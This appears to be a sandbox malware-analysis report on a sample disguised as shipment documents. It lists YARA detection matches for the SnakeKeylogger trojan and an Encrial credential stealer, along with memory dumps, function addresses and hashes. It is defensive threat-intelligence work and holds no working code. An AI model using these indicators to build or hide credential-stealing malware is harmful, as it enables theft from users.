Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: initial sample Static PE information: Filename: rShipmentDocuments.exe
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_0177E06C 0_2_0177E06C
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_058D9518 0_2_058D9518
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_058DA8B0 0_2_058DA8B0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 0_2_058DA8C0 0_2_058DA8C0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3D278 9_2_02A3D278
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A35362 9_2_02A35362
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3A088 9_2_02A3A088
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A37118 9_2_02A37118
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3C148 9_2_02A3C148
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3C738 9_2_02A3C738
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3C468 9_2_02A3C468
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3CA08 9_2_02A3CA08
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A369B0 9_2_02A369B0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3E988 9_2_02A3E988
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3CFAA 9_2_02A3CFAA
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3CCD8 9_2_02A3CCD8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A329E0 9_2_02A329E0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3F961 9_2_02A3F961
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A3E97A 9_2_02A3E97A
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_02A33E09 9_2_02A33E09
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F9C18 9_2_068F9C18
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FFC68 9_2_068FFC68
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F2288 9_2_068F2288
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F1BA8 9_2_068F1BA8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FF3B8 9_2_068FF3B8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F9328 9_2_068F9328
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F0B30 9_2_068F0B30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F5028 9_2_068F5028
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F2970 9_2_068F2970
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FE6A0 9_2_068FE6A0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FE6B0 9_2_068FE6B0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FDE00 9_2_068FDE00
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FEF51 9_2_068FEF51
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FEF60 9_2_068FEF60
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FCCA0 9_2_068FCCA0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FDDFF 9_2_068FDDFF
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F9548 9_2_068F9548
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD540 9_2_068FD540
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD550 9_2_068FD550
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FEAF8 9_2_068FEAF8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FE24A 9_2_068FE24A
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FE258 9_2_068FE258
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F2278 9_2_068F2278
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F8BA0 9_2_068F8BA0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FEB08 9_2_068FEB08
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F0B20 9_2_068F0B20
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F1B77 9_2_068F1B77
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD0E9 9_2_068FD0E9
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD0F8 9_2_068FD0F8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F0007 9_2_068F0007
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FF802 9_2_068FF802
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F5018 9_2_068F5018
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FF810 9_2_068FF810
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068F0040 9_2_068F0040
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD999 9_2_068FD999
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 9_2_068FD9A8 9_2_068FD9A8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_0094E06C 10_2_0094E06C
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_04CE9518 10_2_04CE9518
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_04CEA8C0 10_2_04CEA8C0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_04CEA8B0 10_2_04CEA8B0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069CC2E0 10_2_069CC2E0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C1998 10_2_069C1998
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C66D0 10_2_069C66D0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C4660 10_2_069C4660
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C4ED0 10_2_069C4ED0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C4A98 10_2_069C4A98
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C4A88 10_2_069C4A88
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C1A4A 10_2_069C1A4A
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C6B08 10_2_069C6B08
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 10_2_069C1989 10_2_069C1989
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_03035362 16_2_03035362
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303D278 16_2_0303D278
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_03037118 16_2_03037118
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303C146 16_2_0303C146
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303A088 16_2_0303A088
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303C738 16_2_0303C738
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303C468 16_2_0303C468
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303CA08 16_2_0303CA08
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303E988 16_2_0303E988
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_030369A0 16_2_030369A0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303CFA9 16_2_0303CFA9
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303CCD8 16_2_0303CCD8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_03033AA1 16_2_03033AA1
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303F961 16_2_0303F961
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_0303E97A 16_2_0303E97A
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_030339EE 16_2_030339EE
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_030329EC 16_2_030329EC
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_03033E09 16_2_03033E09
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D81E80 16_2_06D81E80
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8F3B8 16_2_06D8F3B8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D817A0 16_2_06D817A0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D80B30 16_2_06D80B30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D89C70 16_2_06D89C70
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8FC68 16_2_06D8FC68
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D85028 16_2_06D85028
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D89548 16_2_06D89548
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D82968 16_2_06D82968
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8EAF8 16_2_06D8EAF8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8E6B0 16_2_06D8E6B0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8E6AF 16_2_06D8E6AF
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8E258 16_2_06D8E258
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8E249 16_2_06D8E249
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D81E70 16_2_06D81E70
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8DE00 16_2_06D8DE00
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D89BFB 16_2_06D89BFB
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D88B91 16_2_06D88B91
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8178F 16_2_06D8178F
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D88BA0 16_2_06D88BA0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8EF51 16_2_06D8EF51
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8EF60 16_2_06D8EF60
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8EB08 16_2_06D8EB08
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D89328 16_2_06D89328
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D80B20 16_2_06D80B20
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8D0F8 16_2_06D8D0F8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8CCA0 16_2_06D8CCA0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D80040 16_2_06D80040
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8501F 16_2_06D8501F
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8F810 16_2_06D8F810
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8F801 16_2_06D8F801
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D80007 16_2_06D80007
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8DDFF 16_2_06D8DDFF
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8D999 16_2_06D8D999
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8D9A8 16_2_06D8D9A8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8D550 16_2_06D8D550
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 16_2_06D8D540 16_2_06D8D540
Source: rShipmentDocuments.exe, 00000000.00000002.1735749873.0000000007DB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000000.1674316077.0000000000F64000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameYGc.exe6 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000002.1736191962.0000000009214000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000002.1728733569.0000000003327000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000000.00000002.1726790229.00000000013FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000009.00000002.4134998750.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000446000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe Binary or memory string: OriginalFilenameYGc.exe6 vs rShipmentDocuments.exe
Source: rShipmentDocuments.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
